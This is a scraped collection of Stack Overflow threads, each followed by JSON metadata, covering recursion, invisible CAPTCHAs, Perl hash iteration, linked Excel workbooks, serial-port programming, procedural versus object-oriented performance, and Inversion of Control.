Common uses I have found:
*
*sitemaps - recurse through filesystem starting at document root
*spiders - crawling through a website to find email address, links, etc.
*?
A: Mario, I don't understand why you used recursion for that example. Why not simply loop through each entry? Something like this:
String ArrangeString(TStringList* items, String separator)
{
    String result = items->Strings[0];
    for (int position = 1; position < items->Count; position++) {
        result += separator + items->Strings[position];
    }
    return result;
}
The above method would be faster, and is simpler. There's no need to use recursion in place of a simple loop. I think these sorts of examples are why recursion gets a bad rap. Even the canonical factorial function example is better implemented with a loop.
A: Actually the better recursive solution for factorial should be:
int factorial_accumulate(int n, int accum) {
return (n < 2 ? accum : factorial_accumulate(n - 1, n * accum));
}
int factorial(int n) {
return factorial_accumulate(n, 1);
}
Because this version is Tail Recursive
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3021",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "121"
} |
Q: Is there an Unobtrusive Captcha for web forms? What is the best unobtrusive CAPTCHA for web forms? One that does not involve a UI, rather a non-UI Turing test. I have seen a simple example of a non UI CAPTCHA like the Nobot control from Microsoft. I am looking for a CAPTCHA that does not ask the user any question in any form. No riddles, no what's in this image.
A: I think you might be alluding to an "invisible" captcha. Check out the Subkismet project for an invisible captcha implementation.
http://www.codeplex.com/subkismet
A: Try Akismet from the WordPress folks.
A: I think asking the user simple questions like:
"How many legs does a dog have?"
Would be much more effective than any CAPTCHA system out there at the moment. Not only is it very difficult for the computer to answer that question, but it is very easy for a human to answer!
A: Eric Meyer implemented a very similar thing as a WordPress plugin called WP-GateKeeper that asks human-readable questions like "What colour is an orange?". He did have some issues around asking questions that a non-native English speaker would be able to answer simply, though.
There are a few posts on his blog about it.
A: @KP
After your update to the original question, the only real option available to you is to do some jiggery-pokery in Javascript on the client. The only issue with that would be providing graceful degradation for non-javascript-enabled clients.
e.g. You could add some AJAX-y goodness that reads a hidden form field value, requests a verification key from the server, and sends that back along with the response, but that will never be populated if javascript is blocked/disabled. You could always implement a more traditional captcha-type interface which could be disabled by javascript, and ignored by the server if the scripted field is filled in...
Depends how far you want to go with it, though. Good luck
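For illustration only, here is a hypothetical server-side sketch of that honeypot/verification-key idea using the Servlet API; the "website" and "verification_key" field names are made up and would need matching client-side markup:
import java.io.IOException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class CommentServlet extends HttpServlet {
    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp)
            throws IOException {
        // Honeypot: a field hidden from humans via CSS. Real users leave it
        // empty; naive bots fill in every input they find.
        String honeypot = req.getParameter("website");
        // Token: populated by client-side script, so most non-JS bots miss it.
        String token = req.getParameter("verification_key");

        if ((honeypot != null && !honeypot.isEmpty()) || token == null) {
            resp.sendError(HttpServletResponse.SC_FORBIDDEN);
            return;
        }
        // ... process the legitimate submission ...
    }
}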
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3027",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "21"
} |
Q: What's the safest way to iterate through the keys of a Perl hash? If I have a Perl hash with a bunch of (key, value) pairs, what is the preferred method of iterating through all the keys? I have heard that using each may in some way have unintended side effects. So, is that true, and is one of the two following methods best, or is there a better way?
# Method 1
while (my ($key, $value) = each(%hash)) {
# Something
}
# Method 2
foreach my $key (keys(%hash)) {
# Something
}
A: A few miscellaneous thoughts on this topic:
*
*There is nothing unsafe about any of the hash iterators themselves. What is unsafe is modifying the keys of a hash while you're iterating over it. (It's perfectly safe to modify the values.) The only potential side-effect I can think of is that values returns aliases which means that modifying them will modify the contents of the hash. This is by design but may not be what you want in some circumstances.
*John's accepted answer is good with one exception: the documentation is clear that it is not safe to add keys while iterating over a hash. It may work for some data sets but will fail for others depending on the hash order.
*As already noted, it is safe to delete the last key returned by each. This is not true for keys as each is an iterator while keys returns a list.
A: One thing you should be aware of when using each is that it has
the side effect of adding "state" to your hash (the hash has to remember
what the "next" key is). When using code like the snippets posted above,
which iterate over the whole hash in one go, this is usually not a
problem. However, you will run into hard to track down problems (I speak from
experience ;), when using each together with statements like
last or return to exit from the while ... each loop before you
have processed all keys.
In this case, the hash will remember which keys it has already returned, and
when you use each on it the next time (maybe in a totally unrelated piece of
code), it will continue at this position.
Example:
my %hash = ( foo => 1, bar => 2, baz => 3, quux => 4 );
# find key 'baz'
while ( my ($k, $v) = each %hash ) {
print "found key $k\n";
last if $k eq 'baz'; # found it!
}
# later ...
print "the hash contains:\n";
# iterate over all keys:
while ( my ($k, $v) = each %hash ) {
print "$k => $v\n";
}
This prints:
found key bar
found key baz
the hash contains:
quux => 4
foo => 1
What happened to keys "bar" and "baz"? They're still there, but the
second each starts where the first one left off, and stops when it reaches the end of the hash, so we never see them in the second loop.
A: I may get bitten by this one but I think that it's personal preference. I can't find any reference in the docs to each() being different than keys() or values() (other than the obvious "they return different things" answer). In fact the docs state they use the same iterator and they all return actual list values instead of copies of them, and that modifying the hash while iterating over it using any call is bad.
All that said, I almost always use keys() because to me it is usually more self documenting to access the key's value via the hash itself. I occasionally use values() when the value is a reference to a large structure and the key to the hash was already stored in the structure, at which point the key is redundant and I don't need it. I think I've used each() 2 times in 10 years of Perl programming and it was probably the wrong choice both times =)
A: I always use method 2 as well. The only benefit of using each is if you're just reading (rather than re-assigning) the value of the hash entry, you're not constantly de-referencing the hash.
A: The rule of thumb is to use the function most suited to your needs.
If you just want the keys and do not plan to ever read any of the values, use keys():
foreach my $key (keys %hash) { ... }
If you just want the values, use values():
foreach my $val (values %hash) { ... }
If you need the keys and the values, use each():
keys %hash; # reset the internal iterator so a prior each() doesn't affect the loop
while(my($k, $v) = each %hash) { ... }
If you plan to change the keys of the hash in any way except for deleting the current key during the iteration, then you must not use each(). For example, this code to create a new set of uppercase keys with doubled values works fine using keys():
%h = (a => 1, b => 2);
foreach my $k (keys %h)
{
$h{uc $k} = $h{$k} * 2;
}
producing the expected resulting hash:
(a => 1, A => 2, b => 2, B => 4)
But using each() to do the same thing:
%h = (a => 1, b => 2);
keys %h;
while(my($k, $v) = each %h)
{
$h{uc $k} = $h{$k} * 2; # BAD IDEA!
}
produces incorrect results in hard-to-predict ways. For example:
(a => 1, A => 2, b => 2, B => 8)
This, however, is safe:
keys %h;
while(my($k, $v) = each %h)
{
if(...)
{
delete $h{$k}; # This is safe
}
}
All of this is described in the perl documentation:
% perldoc -f keys
% perldoc -f each
A: The place where each can cause you problems is that it's a true, non-scoped iterator. By way of example:
while ( my ($key,$val) = each %a_hash ) {
print "$key => $val\n";
last if $val; #exits loop when $val is true
}
# but "each" hasn't reset!!
while ( my ($key,$val) = each %a_hash ) {
# continues where the last loop left off
print "$key => $val\n";
}
If you need to be sure that each gets all the keys and values, you need to make sure you use keys or values first (as that resets the iterator). See the documentation for each.
A: I usually use keys and I can't think of the last time I used or read a use of each.
Don't forget about map, depending on what you're doing in the loop!
map { print "$_ => $hash{$_}\n" } keys %hash;
A: Using the each syntax will prevent the entire set of keys from being generated at once. This can be important if you're using a tied hash to a database with millions of rows. You don't want to generate the entire list of keys all at once and exhaust your physical memory. In this case each serves as an iterator, whereas keys actually generates the entire array before the loop starts.
So, the only place "each" is of real use is when the hash is very large (compared to the memory available). That is only likely to happen when the hash doesn't live in memory, unless you're programming a handheld data collection device or something else with small memory.
If memory is not an issue, usually the map or keys paradigm is the more prevalent and easier-to-read choice.
A: I would say:
*
*Use whatever's easiest to read/understand for most people (so keys, usually, I'd argue)
*Use whatever you decide on consistently throughout the whole code base.
This give 2 major advantages:
*
*It's easier to spot "common" code so you can re-factor it into functions/methods.
*It's easier for future developers to maintain.
I don't think it's more expensive to use keys over each, so no need for two different constructs for the same thing in your code.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3033",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "119"
} |
Q: Linking two Office documents Problem:
I have two spreadsheets that each serve different purposes but contain one particular piece of data that needs to be the same in both spreadsheets. This piece of data (one of the columns) gets updated in spreadsheet A but needs to also be updated in spreadsheet B.
Goal:
A solution that would somehow link these two spreadsheets together (keep in mind that they exist on two separate LAN shares on the network) so that when A is updated, B is automatically updated for the corresponding record.
*Note that I understand fully that a database would probably be a better plan for tasks such as these but unfortunately I have no say in that matter.
**Note also that this needs to work for Office 2003 and Office 2007
A: So you mean that AD743 on spreadsheet B must be equal to AD743 on spreadsheet A? Try this:
*
*Open both spreadsheets on the same machine.
*Go to AD743 on spreadsheet B.
*Type =.
*Go to spreadsheet A and click on AD743.
*Press Enter.
You'll notice that the formula is an external reference, something like ='C:\path\[workbook-name.xls]worksheet-name'!AD743.
The value on spreadsheet B will be updated when you open it. In fact, it will ask you if you want to update. Of course, your connection must be up and running for it to update. Also, you can't change the name or the path of spreadsheet A.
A: I can't say if this is overkill without knowing the details of your usage case, but consider creating a spreadsheet C to hold all data held in common between the two. Links can become dizzyingly complex as spreadsheets age, and having a shared data source might help clear up the confusion.
Perhaps even more "enterprise-y" is the concept of just pasting in all data that otherwise would be shared. That is the official best practice in my company, because external links have caused so much trouble with maintainability. It may seem cumbersome at first, but I've found it may just be the best way to promote maintainability in addition to ease of use, assuming you don't mind the manual intervention.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3045",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "14"
} |
Q: How do I configure and communicate with a serial port? I need to send and receive data over serial connections (RS-232 and RS-422).
How do I set up and communicate with such a connection? How do I figure out what the configuration settings (e.g. baud rate) should be and how do I set them?
In particular I am looking to do this in Java, C/C++, or one of the major Unix shells but I also have some interest in serial programming using Windows/Hyperterminal.
A: If it needs to be cross-platform, I would suggest looking at Boost Asio.
A: Awhile back I wrote a decent sized application to route connections from a farm of modems through to a TCP/IP network address.
Initially I looked for an unencumbered (free) Serial IO library. I tried Sun's, IBM's and RxTx. They were fine for developing the application, and in initial testing, but in production they each proved unstable.
Finally I paid for SerialIO's SerialPort. Converting over was literally an exercise in changing imports, and the library has been absolutely rock solid - I cannot recommend it enough. My application has been running in the field 24/7 for a couple of years now, with not a single problem encountered by multiple customers.
If you start development using SerialPort, they have a better API and I would use it.
If you need cross platform support, Java with SerialPort was the best choice I could find.
Lastly, their licensing is pretty darn reasonable as long as you are not preinstalling software on the equipment for your customer(s).
A: Build a time machine and go back to 1987? Ho ho.
Ok, no more snarky comments.
How do I figure out what the configuration settings (e.g. baud rate) should be...
Read the datasheet? Ok, ok. Seriously, last one. If you don't know the baud rate of the device you are trying to communicate with, you have two choices. Start guessing, or possibly bust out an o-scope. If you need a good starting point, let me suggest 9600-8-N-1. My suspicion is you can get there with brute force relatively quickly. There's a third option of having an old-school ninja who can tell just by the LOOK of the garbled characters at some standard baud rate what the actual baud rate is. An impressive party trick to be sure.
Hopefully though you have access to this information. In unix/linux, you can get ahold of minicom to play with the serial port directly. This should make it fairly quick to get the configuration figured out.
one of the major Unix shells
In Unix the serial port(s) is/are file-mapped into the /dev/ subdir. ttyS0, for example. If you setup the correct baud rate and whatnot using minicom, you can even cat stuff to that file to send stuff out there.
On to the meat of the question, you can access it programmatically through the POSIX headers. termios.h is the big one.
See: http://www.easysw.com/~mike/serial/serial.html#3_1
(NOT AVAILABLE ANYMORE)
but I also have some interest in serial programming using Windows/Hyperterminal.
Hyperterminal and minicom are basically the same program. As for how Windows lets you get access to the serial port, I'll leave that question for someone else. I haven't done that in Windows since the Win95 days.
A: From the other side, if you want to do it using C#, which will run on both Windows and Linux--with some limitations (EDIT: which may be out of date. I have no way to test it.). Just create a SerialPort object, set its baudrate, port and any other odd settings, call open on it, and write out your byte[]s. After all the setup, the SerialPort object acts very similar to any networked stream, so it should be easy enough to figure out.
And as ibrandy states, you need to know all these settings, like baud rate, before you even start attempting to communicate to any serial device.
A: At work we use teraterm and realterm for checking serial data is correctly formatted. Also we have a hardware splitter with a switch so we can monitor traffic to our application via a cable back to another port.
Windows allows you access to the serial port via CreateFile. That gives you a handle and from there you can configure access.
A: If you want to code in Java I really recommend SerialIOs SerialPort. It is very easy to use and saves you days of work. I've never found an open source library as good as SerialIO, REALLY!
My advice: do not use Sun's serial IO framework! It is from 1998 and full of bugs. You can use rxtx but serialio is better!
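For anyone who does go the rxtx route, here is a hedged minimal sketch using its gnu.io flavour of the javax.comm API; the port name and the 9600-8-N-1 settings are assumptions you would adjust for your device:
import gnu.io.CommPortIdentifier;
import gnu.io.SerialPort;
import java.io.OutputStream;

public class SerialDemo {
    public static void main(String[] args) throws Exception {
        // Look up the port by OS name ("COM1" on Windows, "/dev/ttyS0" on Linux).
        CommPortIdentifier id = CommPortIdentifier.getPortIdentifier("/dev/ttyS0");
        SerialPort port = (SerialPort) id.open("SerialDemo", 2000); // 2s timeout

        // 9600 baud, 8 data bits, 1 stop bit, no parity: a common default.
        port.setSerialPortParams(9600,
                SerialPort.DATABITS_8,
                SerialPort.STOPBITS_1,
                SerialPort.PARITY_NONE);

        OutputStream out = port.getOutputStream();
        out.write("AT\r\n".getBytes()); // e.g. poke a modem
        out.flush();
        port.close();
    }
}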
A: For C/C++ on Windows you have (at least) two choices:
*
*Use the SerialPort class provided by .NET.
*Use the Win32 API. There is an extensive MSDN article dating back to 1995, and many free libraries and examples on the web to get you started.
The .NET option will be much easier.
A: Depending on the device you are trying to communicate with, there may be more parameters than the baud rate, number of data bits, type of parity checking and number of stop bits to consider. If I recall correctly, modems use nine lines of the RS-232C interface. Some devices, for example cash registers, may use hardware handshaking on RTS/CTS lines or on DTR/STR lines.
In general it's good to know how the interface works. You can't communicate if the baud rate doesn't match, but a wrong setting of other parameters might kind of work. For example, you can easily send data to a device expecting 1 stop bit with 2 stop bits set. Problems start when you try to receive data in that case. You can also use an appropriately set parity bit as one of the stop bits, etc.
A: If you are not forced to use a particular compiler, I suggest using Qt, and in the new 5.3 version you will find a class dedicated to serial ports:
http://qt-project.org/doc/qt-5/qserialport.html
The code you will write will run on all supported Qt platforms, at least those that have serial ports.
A: I have been using purejavacomm:
It is an implementation of javax.comm written in pure java + JNA
Unlike rxtx, you don't need to install a dll. It is written in pure Java + JNA, which solved the problem of portability between Windows and Linux for me. It should be easy to port to other OS-es that JNA supports, such as Solaris and FreeBSD, but I haven't tried it.
You might expect a pure java library to lag behind a native implementation such as rxtx in performance, but with modern CPU's, the bottleneck is very likely to be the bitrate of your serial port, not CPU cycles. Also, it's much easier to debug than a mixed Java/Native library or pure compiled native code.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3049",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "49"
} |
Q: Speed Comparisons - Procedural vs. OO in interpreted languages In interpreted programming languages, such as PHP and JavaScript, what are the repercussions of going with an Object Oriented approach over a Procedural approach?
Specifically what I am looking for is a checklist of things to consider when creating a web application and choosing between Procedural and Object Oriented approaches, to optimize not only for speed, but maintainability as well. Cited research and test cases would be helpful as well if you know of any articles exploring this further.
Bottom line: how big (if any) is the performance hit really, when going with OO vs. Procedural in an interpreted language?
A: Bottom line: no, because the overhead of interpretation overwhelms the overhead of method dispatching.
A: In my experience, a site under heavy load will be bogged down and become unresponsive much more easily with OOP code than procedural. The reason is easy to understand.
OOP requires a lot more memory allocations (MALLOC) and a lot more operations to run in memory than procedural code. It requires a lot more CPU time to perform its tasks. It is essentially 'overhead', wrapped around procedural code, adding to the CPU burden to execute it, especially when performing database operations.
Many programmers like the convenience of OOP, creating little black boxes hidden behind simple interfaces. However, I have been paid well to revive sites that were taking forever to respond under heavy user load. Stripping out the OOP and replacing it with simple procedural functions made a huge difference.
If you don't expect your site to be very busy, by all means use OOP. If you are building a high-traffic system, you'll want to strip every CPU cycle from the processing and every byte from the output that you can.
A: Maybe I'm crazy, but worrying about speed in cases like this in an interpreted language is like trying to figure out what color to paint the shed. Let's not even get into the idea that this kind of optimization is entirely premature.
You hit the nail on the head when you said 'maintainability'. I'd choose the approach that is the most productive and most maintainable. If you need speed later, it ain't gonna come from switching between procedural versus object oriented coding paradigms inside an interpreted language.
A: Unfortunately, I've done my tests too. I did test speed, and it's about the same, but when testing for memory usage with memory_get_usage() in PHP, I saw an overwhelmingly larger number on the OOP side.
116,576 bytes for OOP to 18,856 bytes for procedural. I know "Hardware is cheap", but come on! A roughly 500% increase in usage? Sorry, that's not optimal. And with so many users hitting your website at once, I'm sure your RAM would just burn, or run out. Am I wrong?
A: If you are using an interpreted language, the difference is irrelevant. You should not be using an interpreted language if performance is an issue. Both will perform about the same.
A: Your performance will be characterized by the implementation, not the language. You could use the slowest language and it could scale to be the biggest site in the world as long as you design it to scale.
Just remember the first rule of optimization.
Don't.
:)
A: I've actually done a small test like this in python on a website I maintain and found that they are almost equivalent in speed, with the procedural approach winning by something like ten-thousandths of a second, but that the OO code was so significantly cleaner I didn't continue the exercise any longer than one iteration.
So really, it doesn't matter (in my experience anyway).
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3057",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "22"
} |
Q: What is Inversion of Control? Inversion of Control (IoC) can be quite confusing when it is first encountered.
*
*What is it?
*Which problem does it solve?
*When is it appropriate to use and when not?
A: I've read a lot of answers for this, but if someone is still confused and needs a plus-ultra "layman's terms" explanation of IoC, here is my take:
Imagine a parent and child talking to each other.
Without IoC:
*Parent: You can only speak when I ask you questions and you can only act when I give you permission.
Parent: This means, you can't ask me if you can eat, play, go to the bathroom or even sleep if I don't ask you.
Parent: Do you want to eat?
Child: No.
Parent: Okay, I'll be back. Wait for me.
Child: (Wants to play but since there's no question from the parent, the child can't do anything).
After 1 hour...
Parent: I'm back. Do you want to play?
Child: Yes.
Parent: Permission granted.
Child: (finally is able to play).
This simple scenario shows that control is centered on the parent. The child's freedom is restricted and highly depends on the parent's questions. The child can ONLY speak when asked to speak, and can ONLY act when granted permission.
With IoC:
The child now has the ability to ask questions, and the parent can respond with answers and permissions. This simply means the control is inverted!
The child is now free to ask questions anytime, and though there is still a dependency on the parent for permissions, the child is not dependent on the parent as a means of speaking/asking questions.
In a technological way of explaining, this is very similar to console/shell/cmd vs GUI interaction (which is what Mark Harrison's answer above describes).
In a console, you are dependent on what is being asked/displayed to you, and you can't jump to other menus and features without answering its question first, following a strict sequential flow. (Programmatically this is like a method/function loop.)
However with a GUI, the menus and features are laid out and the user can select whatever is needed, thus having more control and being less restricted. (Programmatically, menus have callbacks when selected and an action takes place.)
A: Since there are already many answers to the question but none of them shows the breakdown of the Inversion of Control term, I see an opportunity to give a more concise and useful answer.
Inversion of Control is a pattern that implements the Dependency Inversion Principle (DIP). DIP states the following: 1. High-level modules should not depend on low-level modules. Both should depend on abstractions (e.g. interfaces). 2. Abstractions should not depend on details. Details (concrete implementations) should depend on abstractions.
There are three types of Inversion of Control:
Interface Inversion
Providers shouldn’t define an interface. Instead, the consumer should define the interface and providers must implement it. Interface Inversion eliminates the need to modify the consumer each time a new provider is added.
Flow Inversion
Changes control of the flow. For example, you have a console application where you asked to enter many parameters and after each entered parameter you are forced to press Enter. You can apply Flow Inversion here and implement a desktop application where the user can choose the sequence of parameters’ entering, the user can edit parameters, and at the final step, the user needs to press Enter only once.
Creation Inversion
It can be implemented by the following patterns: Factory Pattern, Service Locator, and Dependency Injection. Creation Inversion helps to eliminate dependencies between types by moving the creation of dependency objects outside of the type that uses them. Why are dependencies bad? Here are a couple of examples: direct creation of a new object in your code makes testing harder; it is impossible to change references in assemblies without recompilation (OCP principle violation); you can't easily replace a desktop UI with a web UI.
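As a hedged illustration of Creation Inversion via constructor injection (all class names here are made up):
// The consumer owns the abstraction, and receives its dependency
// from outside instead of constructing it.
interface MessageSender {
    void send(String text);
}

class EmailSender implements MessageSender {
    public void send(String text) { /* talk to an SMTP server */ }
}

class OrderService {
    private final MessageSender sender;

    // The dependency is handed in; OrderService never calls new EmailSender().
    OrderService(MessageSender sender) {
        this.sender = sender;
    }

    void placeOrder() {
        // ... business logic ...
        sender.send("Order placed");
    }
}

// Composition root: the one place where concrete types are wired together.
class Main {
    public static void main(String[] args) {
        OrderService service = new OrderService(new EmailSender());
        service.placeOrder();
    }
}
Swapping EmailSender for, say, an SmsSender or a test double then touches only the composition root, never OrderService.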
A: Inversion of Control is what you get when your program uses callbacks, e.g. like a GUI program.
For example, in an old school menu, you might have:
print "enter your name"
read name
print "enter your address"
read address
etc...
store in database
thereby controlling the flow of user interaction.
In a GUI program or somesuch, instead we say:
when the user types in field a, store it in NAME
when the user types in field b, store it in ADDRESS
when the user clicks the save button, call StoreInDatabase
So now control is inverted... instead of the computer accepting user input in a fixed order, the user controls the order in which the data is entered, and when the data is saved in the database.
Basically, anything with an event loop, callbacks, or execute triggers falls into this category.
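A hedged Java/Swing sketch of that inversion: we register callbacks and the toolkit decides when to call us:
import java.awt.BorderLayout;
import javax.swing.JButton;
import javax.swing.JFrame;
import javax.swing.JTextField;

public class SaveForm {
    public static void main(String[] args) {
        JFrame frame = new JFrame("Address form");
        JTextField name = new JTextField(20);
        JButton save = new JButton("Save");

        // No fixed input order is imposed; we just say what should happen
        // when the user clicks, and the toolkit calls us back.
        save.addActionListener(e -> storeInDatabase(name.getText()));

        frame.getContentPane().add(name, BorderLayout.CENTER);
        frame.getContentPane().add(save, BorderLayout.SOUTH);
        frame.pack();
        frame.setVisible(true);
    }

    static void storeInDatabase(String name) {
        System.out.println("Saving: " + name);
    }
}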
A: *
*Wikipedia Article. To me, inversion of control is taking your sequentially written code and turning it into a delegation structure. Instead of your program explicitly controlling everything, your program sets up a class or library with certain functions to be called when certain things happen.
*It solves code duplication. For example, in the old days you would manually write your own event loop, polling the system libraries for new events. Nowadays, most modern APIs you simply tell the system libraries what events you're interested in, and it will let you know when they happen.
*Inversion of control is a practical way to reduce code duplication, and if you find yourself copying an entire method and only changing a small piece of the code, you can consider tackling it with inversion of control. Inversion of control is made easy in many languages through the concept of delegates, interfaces, or even raw function pointers.
It is not appropriate to use in all cases, because the flow of a program can be harder to follow when written this way. It's a useful way to design methods when writing a library that will be reused, but it should be used sparingly in the core of your own program unless it really solves a code duplication problem.
A: Creating an object within a class is called tight coupling; Spring removes this dependency by following a design pattern (DI/IoC). The object of a class is passed into the constructor rather than created in the class. Moreover, we give a superclass reference variable in the constructor to define a more general structure.
A: Suppose you are an object. And you go to a restaurant:
Without IoC: you ask for an "apple", and you are always served an apple whenever you ask for more.
With IoC: You can ask for "fruit". You can get different fruits each time you get served: for example, an apple, an orange, or a watermelon.
So, obviously, IoC is preferred when you like variety.
A: What is Inversion of Control?
If you follow these simple two steps, you have done inversion of control:
*
*Separate what-to-do part from when-to-do part.
*Ensure that when part knows as little as possible about what part; and vice versa.
There are several techniques possible for each of these steps based on the technology/language you are using for your implementation.
--
The inversion part of Inversion of Control (IoC) is the confusing thing, because inversion is a relative term. The best way to understand IoC is to forget about that word!
--
Examples
*
*Event Handling. Event Handlers (what-to-do part) -- Raising Events (when-to-do part)
*Dependency Injection. Code that constructs a dependency (what-to-do part) -- instantiating and injecting that dependency for the clients when needed, which is usually taken care of by the DI tools such as Dagger (when-to-do-part).
*Interfaces. Component client (when-to-do part) -- Component Interface implementation (what-to-do part)
*xUnit fixture. Setup and TearDown (what-to-do part) -- xUnit frameworks calls to Setup at the beginning and TearDown at the end (when-to-do part)
*Template method design pattern. template method when-to-do part -- primitive subclass implementation what-to-do part (see the sketch after this list)
*DLL container methods in COM. DllMain, DllCanUnload, etc (what-to-do part) -- COM/OS (when-to-do part)
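To make the Template Method entry concrete, here is a minimal, hypothetical Java sketch; the base class owns the when-to-do part and the subclass supplies the what-to-do part:
// The when-to-do part: the base class fixes the order of the steps.
abstract class DataImporter {
    public final void run() {
        open();
        process();  // calls down into the subclass: "don't call us, we'll call you"
        close();
    }

    void open()  { System.out.println("opening source"); }
    void close() { System.out.println("closing source"); }

    // The what-to-do part: subclasses fill in this primitive operation.
    protected abstract void process();
}

class CsvImporter extends DataImporter {
    @Override
    protected void process() {
        System.out.println("parsing CSV rows");
    }
}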
A: Answering only the first part.
What is it?
Inversion of Control (IoC) means creating instances of dependencies first and the instance of a class later (optionally injecting them through the constructor), instead of creating an instance of the class first and then the class instance creating instances of its dependencies.
Thus, inversion of control inverts the flow of control of the program. Instead of the callee controlling the flow of control (while creating dependencies), the caller controls the flow of control of the program.
A: But I think you have to be very careful with it. If you overuse this pattern, you will end up with a very complicated design and even more complicated code.
Like in this example with TextEditor: if you have only one SpellChecker, maybe it is not really necessary to use IoC? Unless you need to write unit tests or something...
Anyway: be reasonable. Design patterns are good practices, not a Bible to be preached. Do not stick them everywhere.
A: IoC / DI to me is pushing out dependencies to the calling objects. Super simple.
The non-techy answer is being able to swap out an engine in a car right before you turn it on. If everything hooks up right (the interface), you are good.
A: Using IoC you are not new'ing up your objects. Your IoC container will do that and manage their lifetimes.
It solves the problem of having to manually change every instantiation of one type of object to another.
It is appropriate when you have functionality that may change in the future or that may differ depending on the environment or configuration it is used in.
A: To understand the concept, Inversion of Control (IoC) or the Dependency Inversion Principle (DIP) involves two activities: abstraction and inversion.
Dependency Injection (DI) is just one of the inversion methods.
To read more about this you can read my blog Here
*
*What is it?
It is a practice where you let the actual behavior come from outside of the boundary (a class in Object Oriented Programming). The boundary entity only knows the abstraction of it (e.g. an interface, abstract class, or delegate in Object Oriented Programming).
*What problems does it solve?
In terms of programming, IoC tries to solve the problem of monolithic code by making it modular, decoupling various parts of it, and making it unit-testable.
*When is it appropriate and when not?
It is appropriate most of the time, unless you have a situation where you just want monolithic code (e.g. a very simple program).
A: *
*So number 1 above. What is Inversion of Control?
*Maintenance is the number one thing it solves for me. It guarantees I am using interfaces so that two classes are not intimate with each other.
In using a container like Castle Windsor, it solves maintenance issues even better. Being able to swap out a component that goes to a database for one that uses file based persistence without changing a line of code is awesome (configuration change, you're done).
And once you get into generics, it gets even better. Imagine having a message publisher that receives records and publishes messages. It doesn't care what it publishes, but it needs a mapper to take something from a record to a message.
public class MessagePublisher<RECORD,MESSAGE>
{
public MessagePublisher(IMapper<RECORD,MESSAGE> mapper,IRemoteEndpoint endPointToSendTo)
{
//setup
}
}
I wrote it once, but now I can inject many types into this set of code if I publish different types of messages. I can also write mappers that take a record of the same type and map them to different messages. Using DI with Generics has given me the ability to write very little code to accomplish many tasks.
Oh yeah, there are testability concerns, but they are secondary to the benefits of IoC/DI.
I am definitely loving IoC/DI.
3. It becomes more appropriate the minute you have a medium-sized project of somewhat more complexity. I would say it becomes appropriate the minute you start feeling pain.
A: I really don't understand why there are so many wrong answers here; even the accepted one is not quite accurate, which makes things hard to understand. The truth is always simple and clean.
As @Schneider commented in @Mark Harrison's answer, please just read Martin Fowler's post discussing IoC.
https://martinfowler.com/bliki/InversionOfControl.html
One of the most I love is:
This phenomenon is Inversion of Control (also known as the Hollywood Principle - "Don't call us, we'll call you").
Why?
From the Wikipedia article on IoC, I might quote a snippet.
Inversion of control is used to increase modularity of the program and make it extensible ... then further popularized in 2004 by Robert C. Martin and Martin Fowler.
Robert C. Martin: the author of <<Clean Code: A Handbook of Agile Software Craftsmanship>>.
Martin Fowler: the author of <<Refactoring: Improving the Design of Existing Code>>.
A: I feel a little awkward answering this question with so many prior answers, but I just didn't think any of them stated the concept simply enough.
So here we go...
In a non-IOC application, you would code a process flow and include all the detailed steps in it. Consider a program that creates a report - it would include code to set up the printer connection, print a header, then iterate through detail records, then print a footer, maybe perform a page feed, etc.
In an IOC version of a report program, you would configure an instance of a generic, reusable Report class - that is, a class that contains the process flow for printing a report, but has none of the details in it. The configuration you provide might use DI to specify what class the Report should call to print a header, what class the Report should call to print a detail line, and what class the Report should call to print the footer.
So the inversion of control comes from the controlling process not being your code, but rather contained in an external, reusable class (Report) that allows you to specify or inject (via DI) the details of the report - the header, the detail line, the footer.
You could produce any number of different reports using the same Report class (the controlling class) - by providing different sets of the detail classes. You are inverting your control by relying on the Report class to provide it, and merely specifying the differences between reports via injection.
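A hedged sketch of such a Report class in Java; every name here is illustrative, not a real library:
import java.util.List;
import java.util.function.Consumer;

class Report {
    private final Runnable header;
    private final Consumer<String> detailLine;
    private final Runnable footer;

    // The controlling flow is written once; each report injects its details.
    Report(Runnable header, Consumer<String> detailLine, Runnable footer) {
        this.header = header;
        this.detailLine = detailLine;
        this.footer = footer;
    }

    void print(List<String> records) {
        header.run();
        records.forEach(detailLine);
        footer.run();
    }
}

class Demo {
    public static void main(String[] args) {
        // Two different reports would differ only in what gets injected here.
        Report sales = new Report(
                () -> System.out.println("== Sales =="),
                line -> System.out.println("  " + line),
                () -> System.out.println("== End =="));
        sales.print(List.of("widget: 3", "gadget: 7"));
    }
}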
In some ways, IOC could be compared to a drive backup application - the backup always performs the same steps, but the set of files backed up can be completely different.
And now to answer the original questions specifically...
*
*What is it? IOC is relying on a reusable controller class and providing the details specific to your problem at hand.
*Which problem does it solve? Prevents you from having to restate a controlling process flow.
*When is it appropriate to use and when not? Whenever you are creating a process flow where the control flow is always the same, and only the details are changed. You would not use it when creating a one-off, custom process flow.
Finally, IOC is not DI, and DI is not IOC - DI can often be used in IOC (in order to state the details of the abstracted control class).
Anyway - I hope that helps.
A: *
*Inversion of control is a pattern used for decoupling components and layers in the system. The pattern is implemented through injecting dependencies into a component when it is constructed. These dependences are usually provided as interfaces for further decoupling and to support testability. IoC / DI containers such as Castle Windsor, Unity are tools (libraries) which can be used for providing IoC. These tools provide extended features above and beyond simple dependency management, including lifetime, AOP / Interception, policy, etc.
*a. Alleviates a component from being responsible for managing its dependencies.
b. Provides the ability to swap dependency implementations in different environments.
c. Allows a component to be tested through mocking of dependencies.
d. Provides a mechanism for sharing resources throughout an application.
*a. Critical when doing test-driven development. Without IoC it can be difficult to test, because the components under test are highly coupled to the rest of the system.
